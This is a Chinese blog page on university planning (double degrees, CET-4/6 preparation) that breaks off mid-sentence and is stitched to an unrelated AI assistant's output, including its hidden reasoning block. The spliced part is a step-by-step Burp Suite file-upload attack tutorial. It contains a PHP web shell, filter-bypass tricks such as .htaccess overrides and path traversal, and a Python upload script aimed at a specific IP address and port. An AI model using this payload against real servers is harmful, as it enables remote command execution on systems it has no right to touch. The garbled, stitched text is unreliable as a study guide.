重来之大学版|大学四年的规划与目标,大二:双学位是什么意思 ?英语四级怎么备考?计算机二级考试内容,计算机二级有必要考吗?

本文分享了大学双学位的选择考虑因素,强调了时间与金钱的投入。同时,提供了英语四六级备考的经验,包括听力、词汇、阅读和写作的提升方法。对于计算机二级,介绍了考试内容和备考建议,指出计算机二级证书对非计算机专业的重要性。最后,强调了本科成绩对于未来保研、找工作等方面的关键作用。

一、双学位

大二时,有一个很关键的决策:要不要修双学位?

双学位适合下面的情况:

不喜欢自己专业,想换专业的

为考研换学校做打算的

想充电的(去修英语、法律专业的)

这里有两条经验。

第一条是,要是打算大二修双学位,推荐大一就旁听一下专业课,这样子不至于去了双学位以后才发现事实上学的内容和自己想象中的有出入。这换句话说,尽管在大二的时候才考虑要不要选双学位,但事实上大一就要开始准备了。

第二条是,要是打算研究生换专业,那么双学位就是一个很不错的跳板;而要是不打算以后换专业,那尽可能让双学位作为自己专业的一个补充,而不是两个毫不相关的领域,这样子对未来的职业发展会更有帮助。最重要的是,自己要有兴趣。

双学位,不会太难。安排好时间,完全能拿到。另外,双学位有以下成本需要投入。

1.花费钱财

读双学位根据课程的学分付钱。不管最终能不能拿到双学位,已经修过的课程,钱是不退的。

2.占用时间精力

双学位上课地方,通常要两年左右的时长。在其他人玩耍、锻炼、学校社团活动、实习实践的时候,你却四处奔波于双学位的课程,这必定会消耗你大量时间精力。毕业还需要一起肝两篇毕业论文,压力不言自明。

没有周末……周末啥子的不会有,其他人在出去玩的时候你还需要乖乖去辅修学校上课,难以接受的小伙伴们建议不必入坑,会很难受!

学习任务艰巨,尤其是到期末的时候要应对两个专业的作业和考试,我那段日子熬夜真的是常态,所以没法协调的话也不推荐!

如果是跨校辅修,两个上课地方又离得比较远的话,会更加忙碌!!

要是准备考研,后期可能有点儿影响,因为你周末还需要去上课写作业打算期末考啥子的,所以说对时间规划提出了较为高的要求。

3.双学位不会受到国家承认,不享有研究生相同待遇。考国家公务员还是得根据毕业证上的专业进行报名。而对公司企业而言,也会更注重你在工作中的实际工作能力。

总而言之,双学位的缺点一个字归纳就是:累!

二、英语四六级

说真的,英语四六级要是没信心过,就花点钱,报个班吧....考虫啊,周思成的,都挺好的。

高考英语100以上,过四级完全没问题。过六级,花个三个月准备,也完全能过。

我的基础也就高中毕业后中等水平。

英语四级漂过,427分(裸考);六级,525分(准备了一个月)....分数都不高。

下面我说说我自己的方法。

先说明,时间上要花两三个月,想一个月速成的可以走了。各位是大一大二学生,平常要正常上课,也只有课余时间可以备考英语。

不要再像那些傻孩子一样备考四六级了。平常拿本词汇书背,临考前一个周末做两份考试真题,考试真题里送的MP3又不好好听,那最终分数也只能反映你拉跨了的英语水平,比高中还差。

2.1 听力是大头,占分35%

有个规律,四六级分数

<think>我们正在讨论使用Burp Suite测试文件上传漏洞的详细步骤,用户要求从第四步开始更详细地重来一遍,且已经安装好Burp Suite。 之前步骤已经提到: 1. 环境准备(配置代理、安装证书) 2. 访问目标网站,找到上传点 3. 拦截上传请求 4. 修改上传参数(关键步骤) 现在用户要求从第四步之后开始详细说明,所以我们重点放在修改请求后的操作,以及如何使用Repeater模块测试,并验证是否上传成功。 注意:用户是新手,需要非常详细的操作步骤,包括Burp Suite的界面操作和可能遇到的响应分析。 我们将详细描述: - 如何修改请求(包括各种绕过技巧的具体修改位置) - 如何发送到Repeater - 在Repeater中如何修改和发送请求 - 如何分析响应以判断是否上传成功 - 如果失败,如何尝试其他绕过方法 同时,根据规则,在最后提出3-5个相关问题。 </think>### Burp Suite文件上传测试详细教程(续第四步) #### 🔍 续接修改上传参数后的完整操作流程 ```mermaid graph TB A[修改上传参数] --> B[发送到Repeater] B --> C{发送请求} C -->|成功| D[分析响应] C -->|失败| E[尝试其他绕过] D --> F[获取文件路径] F --> G[浏览器访问验证] ``` #### 📝 详细操作步骤(续第四步) 1. **在Repeater模块操作** - 在Burp主界面 → Proxy → HTTP history - 右键选中拦截到的上传请求 → "Send to Repeater" - 转到"Repeater"标签页(左侧菜单栏) 2. **修改请求参数(详细示例)** ```http POST /upload.php HTTP/1.1 Host: 160.30.231.222:33337 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123 Content-Length: 285 ------WebKitFormBoundaryABC123 Content-Disposition: form-data; name="uploadfile"; filename="test.php" ← 修改此处! Content-Type: application/octet-stream ← 修改此处! <?php echo system($_GET['cmd']); ?> ← 添加恶意代码 ------WebKitFormBoundaryABC123-- ``` *修改点说明: - `filename`:尝试改为`shell.php`、`shell.php.jpg`、`.htaccess`等 - `Content-Type`:改为`image/jpeg`或`image/png`伪造图片类型 - 文件内容:添加PHP代码(如`<?php phpinfo();?>`) 3. **发送请求并分析响应** - 点击"Send"按钮(▶图标) - 观察右侧响应区域: ```json // 成功响应示例 HTTP/1.1 200 OK { "status": "success", "path": "uploads/shell.php" ← 关键文件路径! } // 失败响应示例 HTTP/1.1 403 Forbidden { "error": "Invalid file type" } ``` 4. **验证上传结果** - 复制响应中的文件路径(如`uploads/shell.php`) - 浏览器访问:`http://160.30.231.222:33337/uploads/shell.php` - 添加参数测试:`?cmd=whoami` → 应显示服务器用户名 5. **绕过失败的后续处理** | 错误类型 | 解决方案 | |----------|----------| | 文件名过滤 | 尝试`shell.pHp`大小写绕过 | | 内容检测 | 添加GIF头`GIF89a; <?php...` | | 路径错误 | 使用../目录穿越:`filename="../../shell.php"` | | 黑名单限制 | 上传`.htaccess`覆盖配置:<br>`AddType application/x-httpd-php .jpg` | #### 💡 新手常见问题解决 1. **请求发送后无响应** - 检查目标IP是否正确:`160.30.231.222:33337` - 关闭浏览器代理重新打开 - Burp菜单 → Proxy → Intercept → 确认"Intercept is off" 2. **如何保存测试进度** - 右键请求 → "Save item" 保存为.txt - 菜单 → Project → Save project 3. **查看历史记录** - Proxy → HTTP history → 过滤`domain==160.30.231.222` #### ⚙️ 自动化测试建议 ```python # 使用Python脚本批量测试(示例) import requests url = "http://160.30.231.222:33337/upload.php" files = {'uploadfile': ('test.php', '<?php system($_GET["cmd"]);?>', 'image/jpeg')} response = requests.post(url, files=files) print("上传状态码:", response.status_code) print("响应内容:", response.text) ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值